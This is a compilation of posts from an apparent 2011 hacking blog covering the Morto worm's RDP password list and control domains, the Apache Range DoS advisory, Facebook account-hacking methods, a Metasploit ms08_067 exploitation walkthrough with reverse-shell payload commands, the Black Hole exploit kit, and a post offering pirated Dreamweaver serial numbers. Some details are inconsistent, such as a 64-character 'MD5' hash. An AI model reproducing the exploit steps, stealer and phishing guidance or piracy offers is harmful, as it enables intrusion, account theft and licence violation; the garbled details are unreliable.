Morto Worm Leaves Windows RDP At Risk

RDP stands for Remote Desktop Protocol, which uses TCP Port 3389 and enables users to control the desktop of the other computer, RDP's are mostly used in organizations and business environments. Recently a new worm named as Morto worm has became the cause behind the spike in traffic to TCP Port 3389 (Which is used by RDP) according to a report by Fsecure.

How Does The Morto Worm Work?


Morto worm works by starting infecting a single maching (with remote desktop), Once the single machine has been infected it then scans the network for other computers with remote desktop, In technical words scanning network for port 3389 enabled, Once it finds the target computer , it then try to connect with those Remote desktop computers by using the RDP default passwords, here is the list of the passwords which moto tries:

*1234
0
111
123
369
1111
12345
111111
123123
123321
123456
168168
520520
654321
666666
888888
1234567
12345678
123456789
1234567890
%u%
%u%12
1234qwer
1q2w3e
1qaz2wsx
aaa
abc123
abcd1234
admin
admin123
letmein
pass
password
server
test
user

As you can see from the above password list, that Morto worm is using a very basic dictionary attack to compromise the remote desktops. The worm also creates several new files including dll and txt files. As reported by Fsecure:

The infection will create several new files on the system including \windows\system32\sens32.dll and
\windows\offline web pages\cache.txt
Morto can be controlled remotely. This is done via several alternative servers, including jaifr.com and qfsl.net
We've seen several different samples. Some MD5 hashes include:
0c5728b3c22276719561049653c71b8414284844b9a5aaa680f6be466d71d95b

The worm could get more devivasting if brute forcing support is enabled, or a tool like Ncrack is integrated in to this worm, Ncrack is a very powerful RDP Cracker, but it's slow some times and will work on vulnerable machines only.

[Flash 10 is required to watch video]

By now you might have figured out the solution of this problem by your self, If not, It's simple "Use Strong passwords".

Zero Day DOS Vulnerability In Apache Leaves Half Of Internet Vulnerable

Few days ago a massive DOS vulnerability was found in Apache's version 1.3 and 2.x, leaving more than 50% of the internet vulnerable to DOS attack, This Dos attack is so powerful that a single computer can take down the whole server. A new tool named Apachekiller has been observed actively in wild.


According to Apache:

Apache HTTPD Security ADVISORY
==============================
Title: Range header DoS vulnerability Apache HTTPD 1.3/2.x
CVE: CVE-2011-3192:
Date: 20110824 1600Z
Product: Apache HTTPD Web Server
Versions: Apache 1.3 all versions, Apache 2 all versions
Description:
============
A denial of service vulnerability has been found in the way the multiple
overlapping ranges are handled by the Apache HTTPD server:
http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tools has
been observed.
The attack can be done remotely and with a modest number of requests can
cause very significant memory and CPU usage on the server.

The default Apache HTTPD installation is vulnerable.
There is currently no patch/new version of Apache HTTPD which fixes this
vulnerability. This advisory will be updated when a long term fix
is available.

A full fix is expected in the next 48 hours.

Apache Killer

Apache killer is a DDOS/DOS tool written in Perl which sends HTTP GET REQUESTS with multiple byte ranges, These byte ranges occupy a wide variety of portions in the memory space which when abused causes Apache to malfunction.

Currently there is no patch released by Apache regarding this issue, However apache have suggested some immediate mitigation tips. Which are stated as follows:

Mitigation:
============
However there are several immediate options to mitigate this issue until
a full fix is available:
1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
either ignore the Range: header or reject the request.
Option 1: (Apache 2.0 and 2.2)
# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range
# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range
Option 2: (Also for Apache 1.3)
# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]
The number 5 is arbitrary. Several 10's should not be an issue and may be
required for sites which for example serve PDFs to very high end eReaders
or use things such complex http based video streaming.
2) Limit the size of the request field to a few hundred bytes. Note that while
this keeps the offending Range header short - it may break other headers;
such as sizeable cookies or security fields.

LimitRequestFieldSize 200
Note that as the attack evolves in the field you are likely to have
to further limit this and/or impose other LimitRequestFields limits.
See: http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
3) Use mod_headers to completely dis-allow the use of Range headers:
RequestHeader unset Range

Note that this may break certain clients - such as those used for
e-Readers and progressive/http-streaming video.
4) Deploy a Range header count module as a temporary stopgap measure:
http://people.apache.org/~dirkx/mod_rangecnt.c
Precompiled binaries for some platforms are available at:
http://people.apache.org/~dirkx/BINARIES.txt
5) Apply any of the current patches under discussion - such as:
http://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3cCAAPSnn2PO-d-C4nQt_TES2RRWiZr7urefhTKPWBC1b+K1Dqc7g@mail.gmail.com%3e

Apache Killer In Action

Android Is The Number 1 Target Of Hackers

If you are an android users, you could be or might be the next victim of hackers, According to a report by Mcafee, Google android has became the number 1 target of hackers, The Mcafee report also says that the recent attacks from hacktivists Anonymous and Lulzsec security helped in driving a massive increase in Online attacks.
According to the threat report the reason why google android is the number 1 target, is because google is not monitoring the active distribution of mobile apps. As a result of which android users are being the victim of massive malware attacks.


What kind of Malware is being distributed?

According to Mcafee report, the android malware takes over the identity of android user, hence causing an identity theft attack, Once the malware has been installed, the hacker has complete access to any kind of information including personal data, GPS logs and carrier and billing code information.

According to Dave Marcus the Director Of Mcafee Security Labs:

“There is malware ending up on Android phones that is coming out of China and is being used to steal the identity of Android users, Once hackers take control of an Android device, they have access to any kind of information on there including personal data, GPS logs and carrier and billing code information.”

According to me the reason why android is being targeted the most is because most android users do not bother to use any antivirus at all, or if they use it, they do not update it all. As a reason of which it becomes fairly easy for hackers to promote and distribute malware, I don't think that there are any zero days being used, A simple trojan is being used with a little bit code obfuscation to bypass the antiviruses.

How Can I protect My Self From Android Malware?

It's simple install a good antivirus and update it regularly, New malware come up every day, so you should make sure that your antivirus is updated, Plus avoid downloading any untrusted mobile apps which you are not sure about. It would be nice if you could do a little research on the google before installing any google app.

You can download the Mcafee report by clicking here

Advanced SQL Injection - Defcon 17

According to OWASP top 10 vulnerabilities of 2010, SQL injection is the most dangerous and most common vulnerability around, A SQL Injection vulnerability occurs due to improper input validation or no input validation at all, what I mean by improper or no input validation is the user input is not filtered(for escape characters) before it gets passed to the SQL database, A Sql injection attack can be any many forms, but it's usually categorized into 3 types:

1. Inband
2. Out of band
3. Inferential

While browsing on the internet, I came across an excellent presentation on Advanced SQL Injection techniques by john Mccray, In this presentation john Mccray discusses some of advanced SQL Injection methods and topics such as IDS evasion, filter bypassing etc.

Apple Store Down, Hacked?

Well, currently apple store is down in lots of countries, A rumor is currently floating that if it's hacked or a victim of a Dddos attack, which makes people think if the hackivists group anonymous might be behind this attack, Usually when ever apple store is down, apple arrives with a new product launch, however if this is the case and apple is planning for a new product launch, the apple store should have been down in all other countries.


According to a ping test which I ran on apple store, apple store down in few countries where as it's acessible in e coutries, which leaves a possibility for a DDOS attack. Here is the screenshot of apple's app store as you can see it's down and inaccessible.

Here is the screenshot of the just-ping scan which shows that it's apple's store is down in lots countries, with packetloss over 40% is some countries.

We will update you, as soon as we get more information on apple store's status.

Top 10 Ways How Hackers Can Hack Facebook Accounts In 2011

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, I have written a couple of post related to facebook hacking here at RHA, In my previous post which I wrote in 2010 related to facebook hacking and security 4 ways on How to hack facebook password, I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2011, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2010.

10 Ways How Hackers Can Hack Facebook Accounts In 2011

So here are the top 10 methods which have been the most popular in 2011:

1. Facebook Phishing 

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

I have explained the step by step phishing process in my post below:

• How To Hack Facebook Password

2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. I have dedicated a half of my newsest book "An introduction to keyloggers, RATS And Malware" to this topic.

3. Stealers 

Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful. If you want to how stealers work and how you can set up your own one?, Kindly refer the book above.

4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.

Further Information

• Gmail Cookie Stealing And Session Hijacking Part 


• Gmail Cookie Stealing And Session Hijacking Part 2


• Gmail Cookie Stealing And Session Hijacking Part 


• Facebook Session Hijacking Attack(Recommended)

5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.

To know more about sidejacking attack and firesheep, read the post mentioned below:

• Firesheep Makes Facebook Hacking Easy

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

The most popular Mobile Phone Spying softwares are:

1. Mobile Spy
2. Spy Phone Gold

7. DNS Spoofing 


If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

8. USB Hacking 

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:

• Usb password stealer To Hack Facebook Passwords

9. Man In the Middle Attacks


If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below:

• Man In the Middle Attacks With SSL Strip

If you are really interested in learning how man in the middle attacks, you can view the presentation below by oxid.it.

10. Botnets 

Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.


Facebook Hacking Course

Facebook hacking course is a facebook security course created by me, which tells you exactly how how hackers can compromise your facebook accounts and what can you do to protect your facebook accounts from getting hacked.

Click here to get access to the course

Hope you have enjoyed reading the post as much i did while writing.

Note: Copying or reproducing this article is strictly prohibited and will lead to certain consequences, If you are reproducing or copying this article, make sure that you give a proper credit.

Was Myspace Hacked On Friday? - Http/1.1 service unavailable

Earlier friday morning myspace shocked it's users, when the myspace homepage was showing a mysterious message, Lots of people though that anonymous hackivist group might be behind this attack. When ever a visitor came across the myspace homepage the following message was displayed.

We messed up our code so bad that even puppies and kittens may be in danger. Please turn back …now.* Have your pet spayed or neutered.

Lots of people thought that myspace was hacked and the hackers just changed the myspace website with this custom error page, However myspace has been using this error message from 2009 which is occured due to internal errors.

Facebook Will Be Down On November 5 Says Anonymous

Well, here is another shocking news, The famous hackativist group Anonymous claims that they take take down the facebook on november 5. The huge attack is aimed at destroying Facebook. The anonymous hacking group has posted a video in which they explain why will they attack facebook.

Is it really Possible?


Well the attack which anonymous will probably use is a DDOS attack, With facebook having so many servers it's extremely difficult to take down the facebook, but considering the amount of compromised servers which anonymous have under him, it could be possible that anonymous can create a huge denial of service attack which can prevent users from accessing the website from minutes to hours. One server is equal to the power of almost 3000 PC's, According to sources anonymous hacking group have thousands of servers under their control, so there is a possibility that they can pull up a Huge DDOS attack to take down the entire facebook.

The group calls november 5 operation as "Operation facebook", Here is the official press release:

Operation Facebook
DATE: November 5, 2011.
TARGET: https://facebook.com
Press:
Twitter : https://twitter.com/OP_Facebook
http://piratepad.net/YCPcpwrl09
Irc.Anonops.Li #OpFaceBook

Message:
Attention citizens of the world,
Facebook has been selling information to government agencies and giving clandestine access to information security firms so that they can spy on people from all around the world. Some of these so-called whitehat infosec firms are working for authoritarian governments, such as those of Egypt and Syria.

Everything you do on Facebook stays on Facebook regardless of your "privacy" settings, and deleting your account is impossible, even if you "delete" your account, all your personal info stays on Facebook and can be recovered at any time. Changing the privacy settings to make your Facebook account more "private" is also a delusion. Facebook knows more about you than your family. 

http://www.physorg.com/news170614271.htmlhttp://itgrunts.com/2010/10/07/facebook-steals-numbers-and-data-from-your-iph…. 

You cannot hide from the reality in which you, the people of the internet, live in. Facebook is the opposite of the Antisec cause. You are not safe from them nor from any government. One day you will look back on this and realise what we have done here is right, you will thank the rulers of the internet, we are not harming you but saving you. 

The riots are underway. It is not a battle over the future of privacy and publicity. It is a battle for choice and informed consent. It’s unfolding because people are being raped, tickled, molested, and confused into doing things where they don’t understand the consequences. Facebook keeps saying that it gives users choices, but that is completely false. It gives users the illusion of and hides the details away from them "for their own good" while they then make millions off of you. When a service is "free," it really means they’re making money off of you and your information.
Think for a while and prepare for a day that will go down in history. November 5 2011, #opfacebook . Engaged. 

This is our world now. We exist without nationality, without religious bias. We have the right to not be surveilled, not be stalked, and not be used for profit. We have the right to not live as slaves. 

We are anonymous
We are legion
We do not forgive
We do not forget
Expect us

Video

Update

Anonymous leader has confirmed by his twitter account that the news was fake, Here is what he tweeted:

Armitage And Metasploit Video Training Course

In my previous post Attacking Windows XP SP2 With Metasploit, I wrote a step by step guide on how to attack a windows xp host with metasploit, Metasploit is a great penetration testing tool, however there are couple of other tools which can make the usage of metasploit much easier, One of the popular tool is Armitage, As defined by it's authors "Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework.Advanced users will find Armitage valuable for managing remote Metasploit instances and collaboration. Armitage's red team collaboration features allow your team to use the same sessions, share data, and communicate through one Metasploit instance."

Few weeks back the author of Armitage Raphael Mudge,, created a six part video series which explains almost every aspect and usage of armitage in a penetration test, I recently came across the video series and thought to share it with my readers.

Introduction

2. Metasploit

3.Access

4.Post-Exploitation

5.Maneuver

.

6.Team Tactics

If you have any quesions, Feel free to ask

Attacking Windows XP SP2 With Metasploit

In the previous post related to metasploit "How To Use A Keylogger Inside Metasploit Using Meterpreter?", I explained an easy to to use keylogger inside meterpreter in order to get the victims keystrokes, However after writing that article I received some comments which disappointed me alot, The readers were asking questions like "What Is Metasploit", "What is Meterpreter", So I decided not to jump in to the advanced topics before covering the basics.

In this article I will be showing you how to use Ms08_067_Netapi exploit in an Unpatched windows xp to gain access to the machine. The original name of the exploit is "Microsoft Server Service Relative Path Stack Corruption", This exploits helps bypassing NX on various operating systems and service packs, Before we jump into the actual exploitation process, i would suggest you taking some time looking at the exploit code here.

Requirements

1. Bactrack 5 
2. Windows XP SP2 Operating System

We will perform this attack on an unpatched windows xp operating system, I strongly recommend you to try it in a safe environment, Utilizing these methods in a public environment is definitely a crime.

Windows XP SP2 Setup

Before we attack the Windows XP OS, We would want to make sure that it's vulnerable, So before attacking kindly change the following things:

1. Disable Firewall Completly. 
2. Disable Antivrus If Any.
3. Turn off "Automatic Updates"

Attacking A Windows XP Host With Metasploit

So here is how we will hack into the windows XP machine by using metasploit framework, If you are unfamiliar with Metasploit basics, Consider reading our post - Metasploit Framework Explained For Beginners.

Step 1 - First of all turn on your Backtrack 5 virtual machine .

Step 2 - Next on your console type "msfconsole", This will load the metasploit framework.

Step 3 - Next type the command "Show exploits", This will load up all the current exploits in the metasploit.

Step 4 - Next issue the "Search netapi" command in the console, This command will search for all the exploit modules with the pattern "netapi"

Step 4 - Next type "use windows/smb/ms08_067_netapi" in the console.

Step 5 - Now after the exploit has been setup, you would need to enter the RHOST, RHOST refers to the iP address of the victim. You can get the windows host iP by issuing the "ipconfig" command in the command prompt.

Step 6 - Once the exploit is setup, it's time to setup a payload, In this case we will use a Windows/shell/vncinject payloads, Issue a payload by isuing set payload windows/vncinject/reverse_tcp command in the shell, Next you need to set the proper lhost by issuing the command "lhost <iP address>".

Step 7 - Next issue the command "show options" to check to see if every thing is setup fine.

Step 8 - Once you are done with the assessment, just type "exploit" in the console, If you followed up the steps correctly you will have a vnc shell opened on the victims computer.

If you have any questions, Feel free to ask.

CounterMeasures

1. Make sure your firewall is turned on.
2. Make sure you have installed the latest updates

Adobe Dreamweaver CS5 Serial Numbers

Adobe dreamveaver is a very powerful web development tool, it's powerful features have made it the number 1 choice of developers and designers.


I Can't Really Afford To Buy Dreamweaver CS5!
As with every Adobe product we have extremely powerful tools at our disposal, but sadly all of this comes with a nasty price tag :( Setting you back anything up to $1000 Dreamweaver CS5 isn't always an affordable solution.

If you are wondering where to get free Adobe Dreamveaver CS5 Serial numbers then you are in the right place, Fortunately we have the solution to you, We have complied a list of all the working Adobe Dreamveaver CS5 Serial numbers and packed them in to a file, So what are you waiting for go and grab your CS5 Dreamver serail keys from the link below:

Download Adobe Dreamveaver CS5 Serial Numbers here 

Black Hole Exploit Kit - A Deadly Russian Crimeware

Russian hackers have a very strong history with Malware development, Infact russians hackers currently own world's most dangerous malwares. One of those dangerous and popular malware's we have is the "Black Hole Exploit Kit". Black hole exploit kit is basically a collection of tons of browser exploit which takes advantage of the vulnerability on user browser in order to infect your computer.

How Does It Works?

When ever a user visits a clean website, the malicious Iframe then redirects the user to the blackhole exploit server, Which then triggers out all the well known exploits on victims browser and gives remote access to the attacker.

Cost

The annual license for blackhole exploit kit costs around 1500$, the semi annual license costs 700$ and the quarterly license costs 700$. The author also gives you option to rent the exploit kit as well as you can host the exploit kit on authors server for a small fee.

Backtrack 5R1 Arriving On 10th August

Well here is another exciting news for all penetration testers and backtrack lovers, Backtrack will launch backtrack r1(release one) on 10th august, According to offensive security team backtrack r1 will come with around 100 bug fixes and in addition to it backtrack 5 rc1 will also include over 30 tools and numerous package updates.


According to offensive security team:

We have a few exciting items to announce in the upcoming month, one of them being BackTrack 5 R1 (Release one) which will be available for download on the 10th of August,2011. This will complete our first 3 month cycle since the last release. With over 100 bug fixes, numerous package updates and the addition of over 30 new tools and scripts – BackTrack 5 R1 will rock. We will have a pre-release event of BackTrack 5 R1 at the BlackHat / Defcon Conference a few days earlier.